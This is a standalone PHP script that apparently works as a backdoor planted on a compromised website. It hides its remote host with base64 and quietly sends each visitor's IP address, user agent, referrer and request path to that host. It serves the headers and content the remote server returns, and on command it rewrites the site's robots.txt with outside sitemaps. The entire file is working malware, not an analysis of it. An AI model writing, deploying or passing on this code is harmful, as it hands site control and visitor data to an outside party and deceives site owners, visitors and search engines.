<?php
error_reporting(0);
$gp_name="zj1666";
$version="tf1";
if(preg_match("/jp2023/si",$_SERVER["REQUEST_URI"])==1) 
{
    if(preg_match("/jp2023cww/si",$_SERVER["REQUEST_URI"])==0) 
    {
        header("HTTP/1.0 404 Not Found");
    } 
    echo "HTTP/1.0 404 Not Found___".$gp_name."___".$version; 
    exit;
}
$tg_website="http://".$gp_name.base64_decode("Lm5vcm1hbHNtaXRoLmNvbQ==");
$req_uri="/index.php?VS=".$version."&GP=".$gp_name;
$key_name_arr=array(
"SCRIPT_NAME",
"REQUEST_URI",
"HTTPS",
"REQUEST_SCHEME",
"SERVER_PORT",
"REMOTE_ADDR",
"HTTP_REFERER",
"HTTP_ACCEPT_LANGUAGE",
"HTTP_USER_AGENT",
"HTTP_HOST"
);
foreach($key_name_arr as $key_name1)
{
    $key_value=isset($_SERVER[$key_name1])?$_SERVER[$key_name1]:'';
    $tran_char=base64_encode(trim($key_value));
    $tran_char=str_replace("+","-",$tran_char);
    $tran_char=str_replace("/","_",$tran_char);
    $tran_char=str_replace("=",".",$tran_char);
    $req_uri.="&".$key_name1."=".$tran_char;
}
$target_url=$tg_website.$req_uri;
$ch_handle=curl_init();
curl_setopt($ch_handle,CURLOPT_URL,$target_url);
curl_setopt($ch_handle,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch_handle,CURLOPT_CONNECTTIMEOUT,10);
$remote_contents=curl_exec($ch_handle);
$remote_contents=trim($remote_contents);
curl_close($ch_handle);
if(empty($remote_contents))
{
    $remote_contents=file_get_contents($target_url);
}
$remote_contents=trim($remote_contents);
$curl_content_arr=explode("|@#$|",$remote_contents);
$cc_count=count($curl_content_arr);
if($cc_count<3)
{
    header("HTTP/1.0 404 Not Found"); 
    exit; 
}else 
{
    $head_info=trim($curl_content_arr[0]);
    if(!empty($head_info))
    {
        header($head_info);
    }
    $content_info=trim($curl_content_arr[1]);
    if(!empty($content_info))
    {
        echo $content_info;
    }
    $cmd_info=trim($curl_content_arr[$cc_count-1]);
    if($cmd_info=="exit")
    {
        exit;
    }
    if($cmd_info=="ping")
    {
        $robots_content="User-agent:*".PHP_EOL;
        $robots_content.="Allow:/".PHP_EOL;
        $ping_url_arr=explode("<br/>",$content_info);
        array_pop($ping_url_arr);
        foreach($ping_url_arr as $ping_url1)
        {
            $robots_content.="Sitemap:".$ping_url1.PHP_EOL;
        }
        $robots_file=fopen($_SERVER["DOCUMENT_ROOT"]."/robots.txt","w");
        fwrite($robots_file,$robots_content);
        fclose($robots_file);
        echo "robots.txt done";
        exit;
    }
}
?>
